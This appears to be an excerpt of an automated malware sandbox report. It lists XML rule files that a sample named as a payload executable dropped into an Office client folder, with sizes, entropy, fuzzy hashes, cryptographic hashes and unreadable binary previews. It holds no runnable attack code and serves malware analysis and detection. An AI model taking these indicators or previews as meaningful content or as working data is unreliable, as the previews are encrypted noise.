                                                                                                                                                                      MD5:07F744D5683BCAE985F14A8B0CBAD89F
                                                                                                                                                                      SHA1:BF000CA23BCF8F496B3AD1643541E822D691F84D
                                                                                                                                                                      SHA-256:96841453FF19C48B400BE5601E95EB49C6A5E19189179E221E6531D9FCFE1737
                                                                                                                                                                      SHA-512:D2C5AC6A5E2EFEFB035881EA4BB4C0DBEA094FD2CB4C096F1D2F494E044F41B92563AF8665EA738033917DFF15A01DC37EA867A52FF9225A6282102563238C74
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...o...H/.t....:.i.|js?.M...W.bs.db9...b..?Q...9..&.0....3. ...+..!.........W..".GPi*L....J3-...._XYw...A.>['2.......<...N.7.^4.=wj..{|......L....~m$...-Q...ax.PwT6..\b.'..4.{...S...C.....F.....k.z0...x}........s.q2].P.q..h.:q..9rG}v..dz....l,..*P.H.^.l.Wl|..Y.%.P.'.S.7?7.f....BZ.o....q\.ePi.(...f..T6Rj.....`.c....91.(.;P.\Pnl.........A..w..|.$..\...A.4....~..[.n.......KU..y.T....(.....K.....];.F..........S#....Cc.K.}...4.sD.k.5+.G....j.......`#.&..H.rn.../.H8..v".oD)q9.!...5.:..g.2.48pL...QJ..4.-.....#\Z...wm].D.;v.x............N`.{.]..Ub.....B..H..J.Y.C..<...M;.s4..C.OI.:..;....A...\...9....1'b.....H{...3...N..y...k}.w.....P&.J....{\i.ahR]....f.._.,E..s..Y..R+...8.....Z.2?[j.#.qPx.4.....n.y_lP..(..G..X..l%.U$....[.3....h.e.CI.F..b...?..0.].[..x.o..}..Z/XF....i.;.6..[..G|.q..Qp..r.....O|....d....{.6..?..;.<.r.:.$.2.f.`o%...5.o[...{..w...]..V9.)]H..G:..... ...f.7 ..B.g>..L..@....J1.V....5..gv6.W...X...M.9#.k.j...B7..<.Z!.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701900v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1703
                                                                                                                                                                      Entropy (8bit):7.891771651179717
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:oQev0wZ3y/mDT3rCCP1oVGkkHZfd1m4RoUgng37D:hCymPrCCPBH95O83
                                                                                                                                                                      MD5:32A71E7215C1556D1536FAEEB2A11112
                                                                                                                                                                      SHA1:64D3270051FC0BC4502CF9522931D91FFD1E2FEA
                                                                                                                                                                      SHA-256:97CED8FE5A581B5345287CD249999B3F22C070389B91E0751FA22551C03CAE15
                                                                                                                                                                      SHA-512:415F06DA76631FB1211CDD5D235B4B2F1F384C99F6DBA3868218C9046384B1A5F5C22ED2BCC5222BDFC00704EA2A724C78A224EF498A4B2748664F0C3D016599
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlZ ..1.<...3.J......d.....|....7T....U...5'...(y........D.A.....M..s.~f.iA.%....7../d..*!K............Y;...C.6...I.&.`.N...d3...3.(....k..r....l$.}.1.^.]H..u.9.;:g.a...+0T.h.{...z.......0..'l~...rk...7....?P.?...c.....IJ.5...U....Yw..;d.X.....=..,.V$xR..F.=bC...>..o...n5.-..sa...O...m.2.&...O!.@....h...9<6.]..E).r0..$P.~......|..md...v.rV[..g.....T9J.P)...jJ.X...P............w'8.%.G.....7,D.V\.v..sV.R|.3./.k#..C. ...a$[..j.........X.S~.. ..O....>b\..fRa.P>..D....i^D.<fw Y.5...8!..!lE....e.G1...~.5uI.?.6....-...!..A.#",<\X..,......9.w.o.&f.o...=-/..@..u\8....UOFz.."-....V.x.. .Fz...$....,..Qm-.K5RK......b.....Md%...(.|s.wT$.$i9..V.E...[4...u.....xe..g.?..:].7...^...("A..7bP`.....gV.Ao$....A.>ief...]....94z.u....hLV..2u........R.ur..dQ..?x.Zr@.C.....L,p.sy.........S3.....*.J..;5..(...%j....|..C.....{...U.p....o.o~.w.5.J291K..p..Fq...Yz..k3.@.....-e..*i..)2..y..5..k...4.<..S..4,..N.*V.>od...M..?!H...CccF......5...]..YSnU..g..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701901v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1740
                                                                                                                                                                      Entropy (8bit):7.892294592575069
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Y45TOuK11uMIZhjSw43NiqQDDnMjp6yqFSgpRpwAe0TIG2Yw6xtxJnjJj5nrUqIL:9Tv2uMjH3NjnInHvFoKjhjJjRm7AED
                                                                                                                                                                      MD5:29AE563F2E984694DA334060ECBE7EF8
                                                                                                                                                                      SHA1:DA74BD73F543C6A54EB36FE730422CE33728040F
                                                                                                                                                                      SHA-256:805C57961171322EB645750AAF99969A0249CEABBA614286ADD91EB4D5386B34
                                                                                                                                                                      SHA-512:7FC429BD28D6257781FFB880FAE5FD56A98BFA37255354E362F39E22B8F6ADEE15ADE05EED2592893196F3F4E834880ACFFB24C6A23A64ACBC5D0DAF20497F4B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmle.y....Q6q.(0\.\....%i.+7.."...sN..My....y=.U....-...>;yC.7.....D.uI.r....k.Ae.n.w...1W`+.V.{...s .......k.4U.d....-`....8...Q,Z..o...=.+d.>.K..6@j!....u..(SjMr..5............a...P..*....."|.HU....B......7L..6_.+_........m.A.=x...2.h..S.9......Z..Q..4N.....d..K.=.~...Q.e......2...k.. ...4..}].Rb...h...xJ....Z.S.(.4V.k.Pr....\6....Q.^.g2....I.....+.6.4......D....ge...9.9....._..l.Vr.dMR.E..`=aAj..u<~..".|zO...}.Jm...$.cEL-..A.x5}.n..*...,..I.o#....F....PV......-.....k.-......?..A>&.>.g.k...oL. pPL8.kGW..V.|..7+..1^...;.]-.L.Z}......7G.r.T4.Y.s,.Q......E..q.|.<.0.&...H.....W8..."..X..........+ ._p..)L.....UU~.zhd.<....g....l...d.7..s... eK9.:......~d.9z..,.lo.A..q..%.....XQ.%>..@#.Q...rY..?...-....3"}`_O4&.C..v....?.....AR...../V...._.%....N..O....&.t'......KsD..z......x!.A.\....s...2..+.l..f...&}.~!.|.. ...y.n.J..}z.%&&...~...k..Q.3FT./h.:."..c.dc$(..S..'....\.3..#.....6....bh~..}c.o..i........+K.....Ty6Nf......J]l`....?*.Ro0...U...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701950v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1713
                                                                                                                                                                      Entropy (8bit):7.884832133474188
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:8zgji0PXJvb32A0USskEanZiElH9yZlh2efbCj/thPtTTVtgZPQ8zH3sE5bjpNIt:aaJvbLDxEx62os/tTPgZ4xE5bNNIb7ND
                                                                                                                                                                      MD5:6512819ADCB1A97D5ED2105F26E14926
                                                                                                                                                                      SHA1:A7DB7158EC019FEAEFF98344CD0D66D25B55D196
                                                                                                                                                                      SHA-256:6D94A12B27CAA00BB3BE26B33247BECF9DA730F3BA6AC4C281C157CE85A1F13A
                                                                                                                                                                      SHA-512:705EBBC9885A5AB5CD5A6835DAF7976ADF139C8EF3299043F7A5EFE474D1D58BCCC96DECE7870CB8CAE5A5EF0E3D9EA724891D6D50DB748322624A8418F91B99
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...h(....,.5K...]......8..|?B.}..ayE.}I...1.....iT.!z....G.D\-..?....vx....G*.L=..S..^.P..6.*.9.Q...Hc...#.R<.q.....@(.ORV.r.qm67.h.9^..3N..u..Td%..E.X.E-^*..b..~..^......}....t.>eP...3'i..._...(.,.gz."..O.~....9..C.e.?.eh..X.t-.....C.a..8&7{*@.&..7.>b7...]....VR..0.....-......w.../.^.7.NrjxR...^....4..8.o>....9"..AM..r....z...[..|...i.~....}L.....|..2)D.(!..Z.#..z....F...S{.q....-X;8..W..'l........OG.%.2.q...U...Ln..Ve.>h..N...Y.:V%\......7.8!QR:.'.]...#..t.....#hwv>...o.N%=*u...b..*%#..o......5.p....K.B.[w.J.Z.H@.S.....#..2i.C.E&F*...a_.{4.\.7..G.....=..2._.dvs......2^ra..=.p<N.`1L.31....@.T....v.B.|..U.)8.....^...{..M..>..tj..m.yA..V..V..w.V./ne.RN._...........S......Y.Q7.../.T..A.G...(..A.Z.?.....-+. .25.v..f.T.D.0..|..<..D.r.*.).p.}.]=>).)..MN.........D.......U..|XIaSb.....i.le}.....g..q.s^...8.}G.`d.,f..eY....g..w......&.N..GC.DD..>.l..c....`...w....e35.o..;:..h...=...]._e.G.-...y.5.......W..A.`......w.W..;....1....^Y...9Ks..B.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701951v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1750
                                                                                                                                                                      Entropy (8bit):7.893238030579906
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:+fllEm1LHNGR94BYApkUj/roygmjyTtK5Qtwu1TbbFENd9nD:2lim1LtGzm/j/8qQtwu1byD
                                                                                                                                                                      MD5:74A0F3DAF8E5E7FDE9B72D45FA6B5FAF
                                                                                                                                                                      SHA1:1E2970B1B0A4166039C0BCE90CEC4356769DAEAC
                                                                                                                                                                      SHA-256:A52014AEC5DD1E7AD6BDAE79BB41E7A88C7A1D37E27C2F279CEBD8DE892537C4
                                                                                                                                                                      SHA-512:B72EDD45B8FA6E77C7ECB093400F2BB6CED9BA189C14F219F7055213058B566D4A7F5635002903807FCD42128E2638BA4058A93B64A24A1AFD3296DD6C5D3ACE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlz?.r...S..C.-..h.@dI/.....Y.8.k...H......q.....YX.?.#!..&.,.5U.$l.....................T;.P6.ODXL.{..'. $n/K=Y....Ac..s.&v....=Q.X.>..t#PA.;.;.S..q.6.@WW........J6.D..+R#..y..&l.i.>....-.....I....,....ya..7.$...7oB......Y...j.d..|..e......b.i3..)+{|0.<...<...?J.}..F..8....V>E.......`..7....1L.tA..|.|......ha....|.RM...{':.b.]^.......f..S..{...K...~n.pgu.......P...4...|.x|,...?.m.....J8c......E..]J...vE.Z../)5.j/..5c..%..9.Q.6.K.;2yp....hy......7.+....#.d2.8.....xX.D..w....h.?..p..!...sY...........Bb.wj..#.&.....iL=.{...D...:.1_C$..M........!l...Z.r@..kE.....g..^7O..O.....He......~......5...."...$.'dp..p....2H.0.w........=5.....C<.....P.o..l^...%_sU~.7.J.b....yH...B.n^z):.......Z.z`..4.%....4....<Ly?'..@a.E`....@..3.B2....W.z.J...rJr1....... O..... ..N..[...p.M}.pC..\....Tx.1.y..W..g>j..F...i.I .k.....!..]-O...v.)..T.tc..A.d...c..A:7.....3.........5q..ut"......J`.....f.?]....Y..)gH.>.4.{...v.....+......&N..=(....f-}.h.?h,.;.@....G$..?..Xoe.z

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702000v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1693
                                                                                                                                                                      Entropy (8bit):7.874223290326359
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ve5kFTwlsVYy5jEkyIHcuVvjmiqg0Nv7Pa7PM4F25jLR9D:QkFThVYqjEVIH1dLQzyrDF25jLr
                                                                                                                                                                      MD5:78A921E35A378E3717B15FF3862BEC87
                                                                                                                                                                      SHA1:2F50EEFAD5F799987CEAEE1EC77AEFF969C00CC7
                                                                                                                                                                      SHA-256:68C94D1F44304DF5C04A80B8A5EAC94946392C8982CD1ABE5B3F0C2A8CDFC919
                                                                                                                                                                      SHA-512:9A01E1EA46A7107734B84EDD277826E99381DDB97224611393A6E7AA775FEFAF7266A075828FB4CE58D60F01DE6D8B4C66ED3EC1EE4A41AE367BED077BE78569
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlu.es...|7e....,.u9.h{t.....n..d..?......B....ffa;....*...spm."8MLwe..dQO...jJn.F.w.EL.x(..$Bz...9.....c.&.;]I$.{Z.[.>.E<R.$.d...T.....#..r... ......R...m.'..>....i.).A.6.....#.v.;;f+.\...<._.u.>...u6q6.j@....cFI. .......8.?H.......j&..<..-0|4.Z.b...R....{.$*...$.....T.......D.....s|.L..{.Q.....gH.s...y..J....$!.QI[-... .=...{.........<m.].S..:..........3.0.n..p....4.....d.{.....iw..[@TD].!.-p.?.{dk..N<.?..lWk..W....v.>G..I.VD...=.+[.(l..X......^.P...2N....Q.YT~.r.p.E..EO<..w.(%oE'........5.3h...H..>.E...... nN'.r.`...\........=UB..9u..j.{...X.3..w)m.w-.{......v.8...._.uJm4S..=2....>...wN......P.P.g......x<s..#C....'_...$f.@...............RA.?.B.@.T.ASO..E...gB....2._.wg.9..B...[..a...Y.....=v.c.:...z.......e0:}........a.l..0.L<.O....,K.m"!..HU.......E...Z...A......lP.7.K...2..@.....OzP..`.ioy..&D..I...6._k.....(I,.gyp...k...z..j......:G2...w..|.e...+2.r..<.pP...^U%..A...e.{....`...<J.mI...........w.v. m.K;...+\.b.N......;j.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702001v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1730
                                                                                                                                                                      Entropy (8bit):7.87801352237734
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ZolDU3HD5875yB4ZOLxjKdLG1KE4KKpk0KIrqKWX7qD:Z3z58VyB4ZoxedkXKFKwqKWG
                                                                                                                                                                      MD5:CD7027DE5FE0B7E2AE06C267DA8C3263
                                                                                                                                                                      SHA1:10790AA0A05B91A017C06D3D579C88F511ED378C
                                                                                                                                                                      SHA-256:AFF984B765D656FB279EF663C19AB83DD5BD2DDCA8D3440FB0DFC8CF3020915D
                                                                                                                                                                      SHA-512:ED6B6D9FD0CAC125D347788DCBD923EAA9B813C7888F8F1BC1E85E3F6B35443358DD19BDEBDE4BB6C14C2BEFB314BD5D04355D800241DAAC856FB8CAE4E2116B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....xG.5......Ix[..QO.....y.)b.,W....o|......+....._........8l.....$Z..}.+$.~.. .^v..Lqc0.*..U.xj+....~..!<...\.z....g.....^..Pi.!`..#..W.....=O.3..I. O..s...io..L.=..-.".....T c. ..f..f.t....6kQ.."....;..7*4......H....h..7.vOK^i...([.j..Xpw.ed^V.Dz..:-..."A.`..x.........-.U.9..i.L.)...........T".Y..i)S./a.u.D1......{. N....`..e..AC..Y.V%....-......{.#..t.r.KS.Z..G......4...MS..}..<7.bUyjgVB..1.|.Jo.Y....].hI{b..u.h]Q...xSK$6...s.].dxF..:.a......=wv.YV@.}.=FB.n#.s...#/]....,.X/kV...]w_...^.Y......].'....WR|<.9.h.7.p.d.o.c....d..6.K.X.F..9Lr.nF..$.2.+D......9...O...C`.L..~..,D3+..D}.I.Y.0cZ...R.|R..^.?..Cv...E.`.i..u..geV.j..0.{...4E..>.D.>m.Pm.f..#v...T.`...b..o...F..0v...I.v...........g.S...n.k%.oe.*b....Pe..9..+........DC.b.!Y...\..}.b.v.3.|@......./...U..Q.9..I..x5....0..f...Q.=..!].....l/.z.P.....l.#7..Em/+.?j...c.l..>.....P^# .HIi.s..4J9.?....#p.KC9....gp.%..4.q..[;R+k...k..sa...?{........s.I@...mZ....x..o..\...>z...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702050v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1697
                                                                                                                                                                      Entropy (8bit):7.865213753161156
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:byhI/kTh9HS4OS4uM6gKrwbFRiyfMJw8tsgn/YtD:byhI/M7OSy6ggwpMK8sgwV
                                                                                                                                                                      MD5:A376E8317B5770E35831A99654E8861A
                                                                                                                                                                      SHA1:A721DEF60199491B0A8FAA69E6BBC2A835440BF5
                                                                                                                                                                      SHA-256:84792BC9071BB19155A1C8F4F1E37771BEE61AA1B8B7D305FFD28CA9D202B832
                                                                                                                                                                      SHA-512:367DF23A92E2AFE299997E4420163A07D2B15A65CBB2770A997EE070443CA5750A5293DCD48F3C8D709DD1EDB14D39B766847CF73B7A2F8155411B4B91843F58
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.g._q}.k.'w`]..t....@.PN..|.@.Rc..S..uP.....`.................-u. :r........G.#..x.y...P.v'.~..cF=.T.hU.<(k......D.......fY4.x....2T.h..u.|.HH.[.^.).>'......6...#..7.E..=J.... ..H...5n..6?(..p.zy..}...%4.]....P .y...mH...#t.m.......I5.......{.5...r......O......(..X.}.2..a.&C.....KF.....n.6.........'..ad`...T..]s*..je.6..5b...4..W.0!/.....E..F..;BI..,&..|.oE...o.....#.....7.I.P.^!.e.-.W..qg(..0.g...{..m..i?.., :...gs..qa..-.e |.]...$mL.7r1..Y......cLo...).+.M..*z_.....zJ....1..7.........-.6T0T. ...&.......j..A.T.R...k.{f-/rj%+c4)pHf....a&59.~;..$.....c4........&..;B.M.<'R.pt...........P.g73n.x..s.....i..Mx.R<..W3..q..}Tr.=....,.b.Ri.,.<x.*f...)Q.`h;H'.l........W....,...y.'..3y.=..2....k.Cs..Wi.F...T..g...........=.`...!.6.A5s..q..z#rO...v.Q.........F.nd.......v.........4...*$.jK.W .@m..Qg<H..T.1.n..@...wh..@:..<.O..(\.O....<..f(.+t*.df.}....n.Sf..\Fc.l..e($C.][ZY.R...T..b).K....W.Y.-L...v..l2y..w.xl...Y..=.....z].b....}.....3R.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702051v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1734
                                                                                                                                                                      Entropy (8bit):7.904526880467751
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:9tP10DU32FsHYPBAJ0auIqQsXiCUHOiC5D:bPvSsAtWqQsZ/
                                                                                                                                                                      MD5:8406C9FCB9A09BD371778730BDEECD22
                                                                                                                                                                      SHA1:290A0A3AD4E989F9C1F74055458DF1554FA53EC3
                                                                                                                                                                      SHA-256:2CD3C6BB551A9A3AD9CA7DD96E2C9AAD380B3A0DA18B6DB54F81B443F9053FB4
                                                                                                                                                                      SHA-512:6DB5BBA9EEE051185AF79A10E19944A8C3DBB369AC1837BE597979503350B1E482A654DC3923215C003991A061BA5C30574A467D430FD4655C431C3F9B4D2DFC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......fl.J5...Ho.'ec..Y2....o......:..8.....;....MZ...._..J...L.....w.K.D....V.4....!..&...="..=.4.n....<.....#b?M.....>..6.....r..Rq~...._..e.....=.HQ*>...(.^..;.:.....Z..H...M(.?.&{...S...&..I....wq}N..g..2.na......w.L......#...<../2...$...4.h%.`p{...R..<s.w.[.5.....K].*..C.0......'%..&...q...7..L#.U..O}.w..$.j.Z....2....T.&.=Y.}1k..slPdhY..0V.A...o)....4..D.aDB...<.z`.b..h..w...a...wV.UK~..b~...u1R.@vGFb........l.>..N.!.|[.....W...\...xo.....&V...x.@=r....EE.p.a....jt..._../T....:.(..^..._~...g.N.S..l.X.`..>._O.O=.c.W...X.t0....$..H^.Q._.b=5...e.....;....^..4|[].P..e8............X<.F.B|~.e.'AC..D..tR.-.CGP./ff.>...V...........#.6...P..a%...W..Y..}pL...m....-N....@.P.].R...H...Dz..8^.n#..IL..........Af.uCK.[fp.z.R.....P....P.A..T.%.A..D`f.O.p..>.G..S....nRC....r.+.....~....m..M.S......3..0...6..04..+...].m..t.W0...%-g`.._hB?...H..(..A.G.Y.'..S..d.P.I..$i....?,...3.^TVl....QZ..V~....-..uLv..j..3.....\.!..w.b......*;P..M*...E.J.?...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702100v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1704
                                                                                                                                                                      Entropy (8bit):7.905148427395698
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EjybYElEMR4vrncQcsa7ET+eVKQP+y1DAHdaSHGAtcofToX8UJFDfIml/+2bD:OTMR4zc/22QPz1AdxmscobQ8UzAOD
                                                                                                                                                                      MD5:78CD30A236B51A16549BBA912E4F421E
                                                                                                                                                                      SHA1:B8B12FD1740513181176A35E261F583ACEA0446E
                                                                                                                                                                      SHA-256:74DC40CCC4A6DB3139460D792296CA753E5FCD096174547261CC5E17F0BF448C
                                                                                                                                                                      SHA-512:9B38274F25B31C77A43866196FE32296A0D3FA2B97754F31DADFAB722A9274E3E54E2E59E5A095C121A1ABC1A6D837E572AAF8FD9A29A8E90275D9C8274F9E9E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....Y2...g..._q%...9.....# .}.`.f.9.W.j..XwJ.....f...h..w.xW_..k...r\.W.%[L......z.#.$.....'A.....1mo.>.......F.uR....$......%....]....)...v...m.*C$J...K.z...0...<.#E.2....Fm.Q=.8..w.B.....0.3...R.6.".g.`+...3..bm..y{......cG..x...P.,"..".. .8-.....t..._:...v.....;.!...-H.0...D.@..z.n...;..M..N.....7.....c.d........b....|.>..3+ .7RI.Qj..c..t.T&...(..N....=..i..Nl...lZ.$;....5.6k.."PL.f.?...+..,.+1.I..Q....[.../[|..d..I{.-Ol..H.N....?+Sbf..L:...Z.8...5..........%...p.a........TWr....1.\.u.Z*.^.::.'.h..A.B....^.H2.t9;9.C&09.N...t..D....v.H.:.......2v.\..8......cGN2..v......e,...jp|........g"~..SB85.3.....m.J[.ySOS..c...-..Sl.I....:&.^.3.........B.e..%Z..3.....V......h..]..|.A..OAz}!qYT..?l...m......ii..{T....3.EJw.2....1.%.C..t..R/.@...B.\.a.....%...%.u.q........Nn..._n..4F..@..SA.M.>.X*....Z...U1...f.....!.Zt....S.Z..R7..).a6.....G.....y{Pu.7..v...:.......l....R).4...i... "..E.zaG0.2..+4..W8..8.......7....D.~....9....<.6...2D...i|...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702101v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1741
                                                                                                                                                                      Entropy (8bit):7.882922476134448
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:WlF948DPTx9fB4rUgkuo50E3YWk0LTEFUIgTusG0FsxKkLFJYGmOoAzj6ByPXW+W:8iwfekuavkuZIPTkLcJY+f6MPXu1+NKD
                                                                                                                                                                      MD5:D8B18F7065D4B118925ECAF7B4EB59D4
                                                                                                                                                                      SHA1:E944A11137D00F61611410FDD6BA8D73FDCA2F40
                                                                                                                                                                      SHA-256:135B63274D4E7FEBB9FAD870A14876B4420448B25DD567A568E33FDF4D07BFFB
                                                                                                                                                                      SHA-512:4B0A7BF46C146356FCA009D18AB38B63959B7F698173EF9667B752EBFFA878F60E49D62B4FC7D97236482B1599F3BFC0ADDB4EF7C8CEA0604C7D32929AA807FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlN;..2K...)J.....;4,.,.-...`.Q........9...).k.e?.......z~2Ch...X+..W...2d.gl....#c}.O....j..~p..K.......f>t......9dB..@\.%...G.g.DZ...u......8..8....%...5(...bD.@..q.'..E9.A..).xu)....U....1..w...Sc..:9w...........;?...xzi.k...C.j.x..."..In.z...f.q+.....7.m....g../@...=.F~...9f6.U.....'p.....@....:..=.'^..2..BSaz.UE.{....pG...Cw...|e.zi.K]U.j...?a..,........\&.;Z.......K......W...V 1.a.0..).....W...Lk.....).....?.^Xr...)..;,...eG...3$./.pc..:....&.A..)|J.>..N..-Y..9+%.b..L..:^?..,W.#"??._|.....`'^..#p.y.y.4.f.l..d_.< P...UU.j....9...7.........}g.g..&.U`.5|.M...Vb.....$.o.Jj...P/..,........vM.#.w.b''[...?.kI6w..N\c....-Aa.4...t.v.r./.....Ti...o.u.F...Tl....w.K.q...Q..>.,.|..*.FY.5.?q..K.(...I..-6h-...@y.rn...A1..X0........G....g....J4."Lj?..B+`..PW04.... ....^D^..T..X..?y{.n..<;d.s..+'..`S..../.9S.....x<....L......L.....#.t.T..={.c...8_..?M.n{n.)........E.V_D.3@..K._*....V.,.......B..._W.S.D\..N...j..nz;;..~`'..`.N...b...]w..;....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702150v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1693
                                                                                                                                                                      Entropy (8bit):7.8826282836422505
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:dZK9NAPlvpU5fDlwRHg8bRKSfEHl/OTKBG3g8s73RKFwLIPHuyHIt9oW2bD:XlvpU5fDORHBYhHpPp7RKWt29D
                                                                                                                                                                      MD5:D5D6366CBAFEA53D19F03EAD33D5D5C3
                                                                                                                                                                      SHA1:29454EB20F980AC67C156D446147FAD00DC1568C
                                                                                                                                                                      SHA-256:BC1EF628B2E4D341FDB9519932E07B5291DBEE25FA9534A6723EADD9B890DD6C
                                                                                                                                                                      SHA-512:F2352648F25C9C3888488E14EF8AA6A96EE159B1A223405BF6DDE806E46BD27D2B265C0DD299F80D44D6DCAAF0043BE00225AC37E7C50A8AB1432F304A82083C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.ml.%..5...d.+..?s.<..l......EQ.rb.^)......A...)6..U.OR.q.~.g..#......J..gt.....P`.P.7.T..`4...-..JJ....C...1.xM...7.p..^.%e."~L...T.$OW,.9.px"d.IvR..7...).0..4/.xq.+...QmR..x..M..u...u.Gw.N".J...s.O7..o..l.-.f.=J....#.....hm7".H.......!...pH. :.../.[.5=..O..^....O0.v@`.Q.w]..w.,...`.B....2..3.S.Q..:.e.&..`.3.b.....;.o..^..;.+.........1uV.z...&.*...m..k/.8.,...n3.}3G4.;.+.......x..-.....$/.l.b'....}p6....*..K.....Q..4.{...Lr.@.x.^=k.HA..c...K.e....~0...A.OiT.r.w.nan..h..*....).B;.g.i.<,...C.......2T|.r0.-...d...i-.$.Dz.{...Q..5....Q..O......"..\U.c....x.+.....9Y...}...)........1..j.F.p..............m.-W..I......i...T......=7.f.....j.........by....&L.E.b~..P.u.....#.<..J...xqC'..3.W..>..!dg...~!..5v.<....R.....J<..j".1..KQ..E....^*..^K73D.......u.$ ..4.wh...C.m..h.24..8..L.B...;.S...I....(.q7...|X...W...[...s.>.a<....q.o./........2..1*......4.....E=.._..O...8......g..,Y..].(.......d...DE;[=......<;... .._..!.z...5....+t.k..n.:.3..A/f...&..j.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702151v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
